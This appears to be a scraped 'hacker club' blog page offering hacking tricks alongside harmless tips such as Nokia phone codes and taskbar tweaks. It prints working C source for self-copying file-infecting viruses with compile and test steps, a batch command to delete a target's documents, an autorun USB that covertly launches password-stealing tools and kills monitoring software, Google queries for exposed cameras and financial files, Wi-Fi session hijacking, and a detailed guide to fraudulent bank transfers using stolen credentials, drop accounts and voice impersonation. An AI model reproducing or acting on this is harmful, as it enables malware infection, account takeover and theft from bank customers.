Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


How to hackr window administrator password

Hii! This is Pc Hackers Guru Know Many about Hacking
his hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in windowssystem32config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

how to use google for hacking

Hii! This is Pc Hackers Guru Know Many about Hacking
1. Hacking Security Cameras
There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.
2. Hacking Personal and Confidential Documents
Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls

3. Hacking Google to gain access to Free Stuffs

Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.

“?intitle:index.of?mp3 eminem
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3? with “pdf” or “zip” or “rar”.
I hope you enjoy this post. Pass your comments. Cheers!

 

 

How to create virus in C

Hii! This is Pc Hackers Guru Know Many about Hacking
This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %sn”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SECn”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

The USB Lockpick - Hack Any Password(PART-2)

Hii! This is Pc Hackers Guru Know Many about Hacking
FOLLOW THE PREVIOUS STEPS 1,2,3,ON (PART-1)

Step 4Preparing the USB Drive: Making It Bootable


Preparing the USB Drive: Making It Bootable
loading...

i
When doing the following steps, replace the letter m with the letter of your USB drive.
Open a command prompt by Start-Run and typing cmd in the field.
Type m: and hit enter.
Type syslinux.exe -ma m: and again hit enter.
It should look like the picture below, except for the drive letter.
If you get an error, try again and make sure you typed it correctly. If it still does not work, comment and I will try to help.
If you succeed, you can now take out the USB drive.

Step 5Setting The BIOS

You need to set the BIOS so that the USB drive will boot first. Unfortunately, I cannot give specific instructions for this, as it works differently for every motherboard. On bootup, press the key to enter the BIOS. It will be listed on the screen that shows your hard drives and processor right when you boot up, usually at the bottom. It is usually F2. Once you are in your BIOS, you will need to find the boot menu and set the USB drive, usually USB or USB-HDD, to boot first. Then, save and exit. Now, when you boot and have the USB drive plugged in, it should boot off of it. If you are confused, or these instructions do not work, google "set boot order BIOS" and that should provide much more detailed help.

Step 6Erasing the Password

Now, reboot your computer. It should load off the USB drive. You will see some text on your screen. Do not worry, this is what is supposed to happen. To erase a password, follow these steps:
1. Press "Enter" at every prompt it gives you (probably 4 times, it will select the defaults you want) until you see a list of the users on your computer.
2. Type in the user name whose password you wish to clear, and hit "Enter". (It is case-sensitive)
3. It will show a menu of options. Press "1" and then "Enter" to clear the password.
4. Type "!" and again hit enter to exit.
5. It will again ask what to do, type "q" and then "Enter" to exit.
6. It will ask whether to write the files or not. Type "y" and "Enter" to write the files and continue.
7. When it asks for new run, press "Enter" one more time (the default is no).
8. Hit Control-Alt-Delete to reboot or press the power button.
9. Take out the USB drive.

Step 7Finishing Up

Now, your computer will automatically boot into Windows. When you try to login as the user whose password you cleared, you will be able to! Congratulations, you are done.

The USB Lockpick Hack Any Password(PART-1)

forgot your password? Obtained an old computer that was password-protected?
This simple, innocent looking USB drive will erase any Windows password, allowing you full access to an account. And best of all, it is 100% free! (assuming you already have an old flash drive)

Note: This Instructable is designed for password recovery only. The author is not responsible for the consequences of usage for other non-legit reasons.
Also note: The software is provided by this website. This is my first instructable, and I will do the best job I can. Constructive feedback is appreciated.

Step 1What You Will Need


Material-wise, this is not complex, and you should not have a problem getting all of these things.
1. USB storage device (Size is not an issue, the files are less than 4 megabytes)
2. Windows computer with USB ports and internet access.
3. Administrative privileges. (Needed to make the USB drive bootable)

This is designed and works only for Windows. I have only tested it on Windows 7, but Windows 2000 or later should work just fine. Linux users, be happy that your operating system is more secure.

Step 2Preparing The USB Drive: Formatting


Preparing The USB Drive: Formatting
loading...

i
First, format your USB drive in FAT format.
Open My Computer, right click your USB drive, and click Format.
On the menu that pops up, set the file system to FAT, and leave everything else at its default.
Click Start. If a dialog box pops up warning you that it will erase all of the data, click OK.
Wait for it to finish, then click Close.

Step 3Preparing the USB Drive: Files


Preparing the USB Drive: Files
loading...
i
Download the needed files here .
Extract this archive. It will contain an ISO file. You can either extract that (Using winRAR or a similiar program), or mount it (Using an ISO mounter like Daemon Tools).
Copy all of the files from the ISO to your formatted USB drive.
It should look like this:
FOLLOW THE NEXT STEPS 4,5,6,7 ON (PART-2)

How to make an AUTO-HACKING USB DRIVE (PART-2)

Hii! This is Pc Hackers Guru Know Many about Hacking
Follow The First Steps 1,2,3 On (PART-1)

Step 4The "Hacking" Programs


The "Hacking" Programs
loading...
i
Ok. We are now going on to the actual hacking programs. Go to http://www.nirsoft.net/ , and browse the programs. If you have any different websites or programs, feel free to use them. I am using SniffPass, LSASecretsView, and WirelessKeyView. Install them, and place them and the folders they create in the same directory as all the other stuff.

Your computer might identify some as viruses, but don't worry. It only does this because some programs can find certain passwords.

Also, you might notice that I have a folder called "CommandLine." This is a VERY usefull program, and can be downloaded at http://www.beyondlogic.org/solutions/processutil/processutil.htm . There is also a hearty description at this page.

Step 5Modifying KTX.bat


Modifying KTX.bat
loading...
i
It is now time to go back to KTX.bat (by the way, remember that TermX.exe thing I mentioned? Well, KTX stands for "Kill TermX". Feel free to change the batch file name to whatever you want, just MAKE SURE TO ADJUST THE AUTORUN FILE, TOO!).

Go to the part of the Autorun file where it says "start .\Applications\FOLDER\APPLICATION.exe". You are going to change this. Also, add or subtract as many of this line as you need. If you have three programs to run, you need three lines of this code.

First, create a folder in the same place as the Autorun and KTX files, and name it Applications. Drag all the folders that contain the hacking programs into the Applications folder. You should come up with a directory like this:
"My Computer\AutoHax0r\Applications\HACKING FOLDERS HERE (with programs inside the folders)"

Also, you do not have to have the CommandLine in the KTX file. I just use it for my school.

I will include pictures.

Step 6All Finished!


All Finished!
loading...
i
Ok. This is the end of the tutorial. You should have the Autorun.inf file, the KTX.bat file, and some hacking files of your choice. To work the magic of the Auto-Hacking USB Drive, just unplug the drive in question and plug it back in. If it doesn't work, you did something wrong, because I told you how to do it right. Either that, or you have strange computer settings.
FEEDBACK and FOLLOW AT-




How to make an AUTO-HACKING USB DRIVE (PART -1)

Hii! This is Pc Hackers Guru Know Many about Hacking
How to Make an Auto-Hacking USB Drive
loading...
i
I will teach you how to make a basic Auto-Hacking USB Drive. There are probably many different variationsof this. I will be showing you the most basic.

You need two things:
1) A USB Drive devoted to this
2) The programs and files that I will show you how to make or where to get. If you have trouble making the two files that I show you how to create, they can be downloaded at the end of the Instructable.

OK PEOPLE!!!!!
THIS AUTO-HACKING USB DRIVE SIMPLY CONTAINS APPLICATIONS THAT RECOVER PASSWORDS AND SUCH. STOP LEAVING POSTS ABOUT HOW YOU DON'T UNDERSTAND WHAT GETS HACKED.

Step 2The Autorun File


The Autorun File
loading...
i
So. Here we go. We will start with the Autorun file.

This file is the one that makes the pop-up window when you plug in the USB Drive. You can use this on any USB Drive, even if it has U3 on it.

Open Notepad (I'm using Notepad++) and type the following:

(autorun)
label=(Name you want the drive to have)
icon=(Icon file).ico
open=(Batch file we will make later).bat
action=(What you want the action to be)

MAKE SURE YOU DO NOT TYPE THE ()'s! Where it says (autorun), replace the parentheses with brackets (the buttons to the right of the "p" key on the keyboard. USE THE BOTTOM BRACKETS, NOT THE TWISTY FRENCH BRACKETS!)

Save this file as Autorun.inf

Make sure that you save it immediately inside your USB Drive, not inside any sub-folders (My Computer, Autohax0r).

Also, I have used an icon (an .ico file), so the USB Drive will have a different picture than the boring standard picture. To get one of these, I advise going to http://www.iconarchive.com/ to get an .ico file (you have to specifically download it as .ico). If you do this, save the icon in the same place as the Autorun file.

Step 3The Batch File


The Batch File
loading...
i
We will now make the batch file that starts all the "hacking programs." MAKE SURE YOU NAME IT THE SAME AS WHAT YOU CALLED IT IN THE AUTORUN FILE!

Type this into Notepad:

@echo off
title KTX
start .\Applications\FOLDER\APPLICATION.exe
start .\CommandLine\Process.exe -k TermX.exe
start .\CommandLine\Process.exe -k WinVNC.exe
pause
goto eof

I will explain the commands used:
@echo off: Makes it so the file pops-up without showing the commands. Makes it look more professional.

title: Makes a title at the top of the batch file.

start: If you can't figure this one out, you should not be reading this Instructable.

pause: Pauses the file, waits for you to press any button.

goto: Sends the file to a different part of the script.

eof: End of file.

Also, TermX.exe is a program that my school uses to keep us out of certain websites. IT IS NOT THE FIREWALL. For info on WinVNC.exe, go to http://www.processlibrary.com/directory/files/winvnc .

Where it says \FOLDER\APPLICATION, you will change this in two steps.

Save this as KTX.bat, and place it in the same place (directory) as the Autorun.inf file.
NOTE=Step 4,5,6 on next (PART-2)

How to Add A Facebook Badge To Your Blogger Blog

Hii! This is Pc Hackers Guru Know Many about Hacking
Badges are a customizable way to share your Facebook information on other web sites. When you put your badge on a site, it will be automatically updated and visible to anyone even to non-Facebook users. You can use this profile badge to replace blogger’s default profile widget which do not look cool. Facebook profile badge is nicely designed and gives a professional look to your blog.


To add a facebook badge to your website/blog, simply follow the steps given below : 

  1. First click on this link
  2. Copy the code given there. You can also customize the badge before copying the code by clicking on Edit this badge button.
  3. Now sign in to your blogger blog and go to
    Dashboard -> Layout -> Page Elements
  4. Click on Add a Gadget button in the sidebar, a new window will open and select HTML/JavaScript
  5. Now paste the code in HTML/JavaScript window and save it.
  6. That’s all. Now your Facebook badge will be displayed on your blog  Add A Facebook Badge To Your Blogger Blog : How To

How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

Hii! This is Pc Hackers Guru Know Many about Hacking
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.119.112.245.
That is be the IP address of the sender!
5. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

FeedBack At 
Hacker;s Contact 9779775352

SIMPLE VIRUS CODING

Hii! This is Pc Hackers Guru Know Many about Hacking

Run this on your own responsibility*/


VIRUS CODE-1


IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.
Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Some Useful Nokia Mobiles Phones Secret codes

Hii! This is Pc Hackers Guru Know Many about Hacking
On the main screen type
*#06# for checking the IMEI
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.

*#2820# Bluetooth device address
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.
 
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)

5. (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use gprs and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from 
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
 
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#

*#7328748263373738# resets security code.
Default security code is 12345
*#1471#  Last call (Only Vodafone)

*#21#  Allows you to check the number that "All Calls" are diverted to

*#30#  Lets you see the private number

*#43#  Allows you to check the "Call Waiting" status of your phone.

*#62#  Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to

*#67#  Allows you to check the number that "On Busy Calls" are diverted to

*#67705646#  Removes operator logo on 3310 & 3330

*#73#  Reset phone timers and game scores

*#746025625#          Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible
 
*#7780#  Restore factory settings

*#8110#  Software version for the nokia 8110

*#92702689# 
Displays - 1.Serial Number, 2.Date Made,
3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data

12345  This is the default security code

press and hold #
Lets you switch between lines

 

     

Trick to Show Your name after time in taskbar...

Hii! This is Pc Hackers Guru Know Many about Hacking 
Try this  trick to add up ur name in place of AM and PM beside time
Its simple
Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.
Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

Hidden programs in window xp

Hii! This is Pc Hackers Guru Know Many about Hacking
Hidden Programs in windows Xp. Type the following commands in RUN.
Programs :
1. Private Character Editor :
Used for editing fonts,etc.
** start>>Run
** Now, type eudcedit

2. Dr. Watson :
This an inbuilt windows repairing software !
** start>>Run
** Now, type drwtsn32
3. Media Player 5.1 :
Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!
** start>>Run
** Now, type mplay32

4. iExpress :
Used to create SetupsYou can create your own installers !
** start>>Run
** Now, type iexpress


How to Hack Wifi Password

Hii! This is Pc Hackers Guru Know Many about Hacking

Change Text on xp start button

Hii! This is Pc Hackers Guru Know Many about Hacking
n order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b] 

How To Hack Computer through WiFi

Hii! This is Pc Hackers Guru Know Many about Hacking
The internet is ever growing and you and I are truly pebbles in a vast ocean of information. They say what you don’t know can’t hurt you. When it comes to the Internet believe quite the opposite. On the Internet there a millions and millions of computer users logging on and off on a daily basis. Information is transferred from one point to another in a heartbeat. Amongst those millions upon millions of users, there’s you.

In this tutorial i am going to show you how to to access someone's facebook, youtube, and many other accounts which is using the same WiFi as you.

You need:

  1. Mozilla Firefox
  2. Firesheep - A Firefox extension that demonstrates HTTP session hijacking attacks.
  3. WinPcap - WinPcap is an open source library for packet capture and network analysis for the Win32 platforms. It includes a kernel-level packet filter, a low-level dynamic link library (packet.dll), and a high-level and system-independent library.

Step 1: Install WinPcap then drag the Firesheep add-on, and put it on the Firefox icon. Firefox will open and will ask you to install the add on. Install it and restart Firefox.

Step 2: Open the add-on (You can do it by clicking on View -> Sidebar -> Firesheep), then click on Start Capturing and it'll start capturing, and as soon as somebody logs in any account it'll show up the logs, and then you can access their account.

Simple, but functional and VERY effective method to hack someones facebook, youtube, myspace, etc. account through WiFi

Bank Transfer For Beginners

Hii! This is Pc Hackers Guru Know Many about Hacking
The first thing you are going to need is banking credentials of some sort. The information you need will be different for each bank and depend on how your doing the transfers if by phone or online so research is the key here!

If you are doing the transfers online take a look at the banks login pages to determine exactly whats needed to login, you might also need additional information like a password or code to make a transfer so it's a good idea to set up a bank account with internet banking on the bank your targeting, this way you will be able to see all that is needed and not just what you need to log into the actual website.

The usual information needed to log into online banking is usually like; (remember different banks = different info)

  1. Username/account number
  2. Password
  3. Letters/Numbers of a security code
  4. Answers to secret question
  5. Date of birth (sometimes)

For transfers it's much better to talk and bank using the telephone, this is far more successful than online transfers because it doesn't attract so much suspicion when a few thousand is being sent somewhere and banks will process the transfer there and then meaning that if your phone call to them is successful there is a 95% chance your transfer will be too.

You need different information to do this type of transfer and like before it's different with each bank, also like before it's a good idea to set up a bank account with the bank and make a transfer by phone, this way you will know what to expect when you go to make a fraudulent transfer by phone.

Here is a rough guide of what you might need;
  1. Account number
  2. Sort Code
  3. Address Details
  4. Date of Birth
  5. Mother maiden name
  6. Answer to secret questions

All the information you need for any type of transfer can be bought online for a relatively small amount of money, the details for online transfers will usually cost you between 3-15% of the account balance. Information to make phone transfers will normally cost between $15 upto $50 and this depends on how much information is given to you about your mark.

Alternatively you can collect and gather this information yourself by the many ways available such as botnets, phishing, data mining etc...

After you have got the information you need you will need to find or set up a bank account which the stolen money can be transferred into (bank drop), for obvious reasons this must not be an account in your real name! The most common method of getting an account for this is to find people willing to offer they're account for a percentage of the money, normally 30-60% of the transferred amount. Another way of getting bank drop accounts is to set them up yourself using fake ID and counterfeit documents, there is a little extra work and investment needed for doing this but the returns financially are well worth it.

Now you have information and a bank drop account you are ready to make the transfer, here is some information and steps on how to go about making both phone and online transfers.

Telephone banking

In theory this method is pretty self explanatory because all you really need to do is make a call to the telephone banking line of your target bank and answer any questions they ask as if you were the person whose details you have but like any type of transfer true success will depend on how well you plan and carry off the operation so you must talk in a calm, cool and collective way.

Acting or at the very least voice impersonation will play a major role in transfers made by phone because NO bank is going to accept a transfer from someone on the phone who has the relatively squeaky voice of a teenager or young adult when the original account holder is supposed to be 60 years old so you must take the time to perfect your voice to sound like the account holder might. Sometimes the dialect of a voice can also make a bank worker weary of a transfer because if the account holder lives in Australia and you were born in India he or she might be able to spot this in your fake voice so you must must must! get the dialect,tone and language of your targets country correct or you will fail, simple!

When you have your voice you are ready to make the call, it's a good idea to use call spoofing and forwarding to have your targets telephone number registered with the bank appear on caller ID because some banks may check this or use it as further verification, there is sometimes also some sort of voice changing functionality with some of those call services which is a good feature to add to the fake voice your making vocally or if you have female info and you want to sound like so.

It's not usually necessary to use spoofing so if your making a call just make sure you are doing so from an unregistered pre-paid cell phone or pay phone and not the personal land line number in your house.

Online transfers

Again like before it's pretty easy to do but there is a lot of different aspects that can effect the success you have with this method of transfer. All banks have different procedures and levels of tolerance regarding online transfers, most of your work at the start will involve research, trial and error and perseverance to figure out the best ways in doing it and how to maximize your profits from it.

Okay so you have your information and a drop account, now you need to make the actual transfer! When you are doing anything illegal electronically via a computer you MUST secure your identity or so called virtual fingerprint paper trail your system and modem leaves behind, you can do this by using socks, virtual private networks, hacked wireless connection or any other form of legitimate anonymizing techniques and principals to protect your IP address and ultimately your identity and location. A good rule of thumb is to display an IP address located within a local proximity to that of your marks location or geographic area so an IP from the same city or state is ideal.

after this step you can successfully and safely login to online banking!

Now we have to think about what we are doing... as mentioned before the banks generally set an amount of money which is deemed acceptable and safe to transfer online, the history of the account holders' transfers will also come into play so it's your job to determine the highest amount a bank will accept in an online transaction without arousing suspicion, this can be done by looking at the payment history of an account and using your research inline with what you discovered as the banks acceptable amount in comparison to the balance and history ratio. It is no good trying to transfer $8k from an account with a $10k balance when the real account holder has never made a transfer bigger than $3k before.

So after you have a figure you think or know is safe to transfer you can attempt to make the transfer, please take a look below for more information regarding transfers in general.


General notes and tips about making any type of transfer

The best time to make a transfer is during big seasonal/regional/public holidays like Christmas or Summer, people spend a lot of money at these times so the chances of a successful transfer increases and suspicion falls, please remember it's not the same for small holidays or seasonal events like at the beginning of a new year because people tend to hold back on spending at those times because they spent so much at Christmas etc...

Transferring money into a bank drop account from the same bank will usually happen instantly so you can cashout the money on the same day the transfer was made, sometimes this can be seen as suspicious though. If you are transferring money into a different bank it will take between 1-4 days for the money to appear in the drop.

Don't transfer money at the weekend because people usually use they're cards a lot more on weekends when they are off work and out shopping so they will find out money has been taken from their accounts faster, best day(s) to make a transfer is Sunday,Monday or Tuesday.

If available select the option to take the money from the account on the day it will actually be transferred (1-4 days) there is usually a box to tick online for you to do this or you can tell the bank worker via the telephone that this is what you want.

If you have a big balance account like $250k it doesn't mean you can automatically transfer $75k out of that account because it's a small amount in comparison to the balance, a good rule is to take between 3-7% of the big balances but also remember the history of the payments is also very important, try to transfer what the banks sees normally from the account holder.

Make small transfers to your drop account that the account holder might not see or report, if you make a big transfer 2-3 weeks later there is a good chance of success because the bank will see money has previously been sent to the same account and no problems were reported.

Online only;

Take a look at the last log in date for the account or ask your vendor to do this if they checked the account after getting it because if the person doesn't log into or use online banking often there is a chance the success of a big transfer will fall and you will then be able to adjust your transfer accordingly, you will also know that person probably isn't going to see a bank statement until the end of the month.

Bypass Facebook Security To Hack Facebook account Password

Hii! This is Pc Hackers Guru Know Many about Hacking
